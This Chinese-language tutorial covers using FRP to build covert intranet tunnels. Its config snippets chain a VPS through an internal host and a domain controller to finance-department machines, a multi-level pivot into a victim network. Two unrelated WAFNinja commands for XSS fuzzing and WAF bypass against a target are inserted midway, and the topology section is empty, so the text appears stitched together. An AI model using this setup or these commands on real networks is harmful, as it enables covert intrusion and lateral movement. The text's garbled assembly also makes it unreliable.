内网隐蔽通信隧道：FRP技术

前言：

本文详细介绍了关于FRP代理的配置，以及如何使用FRP建立一级、二级、三级代理。FRP是一款专注于内网穿透的高性能反向代理应用，支持TCP、UDP、HTTP、HTTPS等多种协议。它能够将内网服务以安全便捷的方式通过具有公网IP节点的中转暴露到公网，为用户提供灵活的网络连接方案。以下是关于FRP配置和代理建立的详细步骤。

安装：

下载地址：https://github.com/fatedier/frp

解压下载的压缩包，将其中的frpc拷贝到内网服务所在机器上，将frps拷贝到具有公网IP的机器上。启动命令：

• Windows：frpc.exe -c frpc.ini
• Linux：./frpc -c ./frpc.ini

代理类型：

FRP支持多种代理类型以适应不同的使用场景：

• tcp：单纯的TCP端口映射。
• udp：单纯的UDP端口映射。
• http：定制化的HTTP代理，支持修改Host Header和增加鉴权。
• https：定制化的HTTPS代理。
• stcp：安全的TCP内网代理，需要在访问者和被访问者的机器上都部署frpc。
• sudp：安全的UDP内网代理，同样需要在两端都部署frpc。
• xtcp：点对点内网穿透代理，功能同stcp，但流量不需要经过服务器中转。
• tcpmux：支持服务端TCP端口的多路复用。

工具使用：

以下是一些基本的使用示例：

Fuzz（模糊测试）：

<code>python wafninja.py fuzz -u “http://www.target.com/index.php?id=FUZZ“ -c “phpsessid=value” -t xss -o output.html</code>

Bypass（绕过WAF）：

<code>python wafninja.py bypass -u “http://www.target.com/index.php“ -p “Name=PAYLOAD&Submit=Submit” -c “phpsessid=value” -t xss -o output.html</code>

多级代理建立步骤：

一级代理：在VPS上启动frps服务，并在内网主机上启动frpc服务，建立一级代理。

<code># frps.ini (VPS) [common] bind_addr = 0.0.0.0 bind_port = 7000 </code>

<code># frpc.ini (内网主机) [common] server_addr = VPS_IP server_port = 7000</code>

二级代理：在内网主机上启动frps服务，并在域控机器上启动frpc服务，建立二级代理。

<code># frps.ini (内网主机) [common] bind_addr = 10.10.3.100 bind_port = 7000 </code>

<code># frpc.ini (域控机器) [common] server_addr = 10.10.3.100 server_port = 7000</code>

三级代理：在域控机器上启动frps服务，并在财务独立内网机器和财务核心机器上启动frpc服务，建立三级代理。

<code># frps.ini (域控机器) [common] bind_addr = 10.10.21.5 bind_port = 7000 </code>

<code># frpc.ini (财务独立内网机器) [common] server_addr = 10.10.21.5 server_port = 7000 </code>

<code># frpc.ini (财务核心机器) [common] server_addr = 10.10.21.5 server_port = 7000</code>

网络拓扑图：

总结：

FRP作为内网穿透工具有诸多优势，包括支持多种协议、简单易用、跨平台等特点。通过合理配置和代理建立，可以实现复杂网络环境中的隧道连接，提供灵活而高效的网络访问解决方案。